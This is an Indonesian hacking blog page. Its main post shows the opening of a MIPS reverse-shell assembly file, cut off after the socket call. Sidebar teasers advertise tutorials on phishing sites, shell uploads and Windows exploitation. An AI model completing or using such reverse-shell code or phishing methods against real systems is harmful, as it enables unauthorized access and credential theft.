Mobile Application Hacking Diary Ep.1
Hacking Trust Relationships Between SIP Gateways
A Pentester's Guide to Hacking OData
Hacking Android for Fun and Profit
Armitage - Hacking Made Easy Part 1
[Paper](spanish)-Hacking dispositivos iOS(iPhone, iPod, iPad)
Hacking Embedded Devices For Fun & Profit
Wireless Hacking & Wireless Security
Hacking your Droid
Hacking the Skiddies
[Iranian] ASP Hacking Methods
The Joomla Hacking Compendium
Simple Web-Hacking Techniques
The End Tksh For Download ;)
Archive
Statistic User
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Blogroll
Blog Roll
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Blog Archive
Pages
Rabu, 05 Maret 2014
SHEEL CODE FOR LINUX
# MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com
.data
.bss
.text
.globl _start
_start:
#Close stdin(0)
slti $a0, $zero, 0xFFFF
li $v0, 4006
syscall 0x42424
#Close stdout(1)
slti $a0, $zero, 0x1111
li $v0, 4006
syscall 0x42424
#Close stderr(2)
li $t4, 0xFFFFFFFD #-3
not $a0, $t4
li $v0, 4006
syscall 0x42424
#Socket Domain - AF_INET (2)
li $t4, 0xFFFFFFFD #-3
not $a0, $t4
#Socket Type - SOCK_STREAM (2 for mips)
not $a1, $t4
#Socket Protocol - 0
slti $a2, $zero, 0xFFFF
#Call socket
li $v0, 4183
syscall 0x42424
LAnjutan Klik Here
E-Book Hacking 2014 Update
Assalamualaikum Kali Ini Saya Akan Membagikan Saudara-Saudara Ebook Hacking Yang Selain Mengajarkan Anda Buat HAcking Dengan Aman Jika Anda MEnggunakanya Dengan Bijak..
Windows 8 Hacks
Hacking and Securing iOS Applications
Hacking, 2nd Edition
Hacking For Dummies, 4th Edition
Windows 8 Hacks
Hacking and Securing iOS Applications
Hacking, 2nd Edition
Hacking For Dummies, 4th Edition
Langganan:
Postingan (Atom)
Pencarian
Follower
Entri Populer
-
1 ) MENEMUKAN TARGET DAN MENDAPATKAN ADMIN PASSWORD Pertama kita harus menemukan website target kami untuk melakukan itu Anda dap...
-
1 buka dulu scrip yang ingin anda edit boss contoh siapkan note pad. . 2 siapkan sript yang ingin di edit dengan .html agar lebih mudah gan...
-
Mobile Application Hacking Diary Ep.1 Hacking Trust Relationships Between SIP Gateways A Pentester's Guide to Hacking OData Hacking A...
-
Assalamualaikum Sedikit cara dari saya, cara upload shell jpg . Guna shell jpg adalah meminimalisir •terhapusnya shell •ketahua...
-
Assalamu'alaikum Wr Wb :hi: ketemu agy ma ane : Mr.kamikaze gak usah banyak cingcong dh : CEKIDOT !!! ===============...
-
emarin seriing temuin folder di PC yang tidak bisa di hapus, salah satunya .Trash-1000/.Trash-1001 akibat pakek backtrack, dan kemarin mut...
-
Hei teman . Hari ini saya memberitahu Anda bagaimana untuk membuat website phishing , cara menaruhnya online dan bagaimana untuk me...
-
# MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode # Written by Jacob Holcomb, Security Analyst @ Independent Security E...
-
Dalam tutorial ini saya akan mengeksploitasi Windows 7 Sp1 OS menggunakan Metasploit . saya akan menggunakan mengeksploitasi / m...
-
Salah satu tujuan seseorang untuk mengganti Mac Address adalah karena berbuat usil pada jaringan komputer kampus atau kantor seperti Suka ...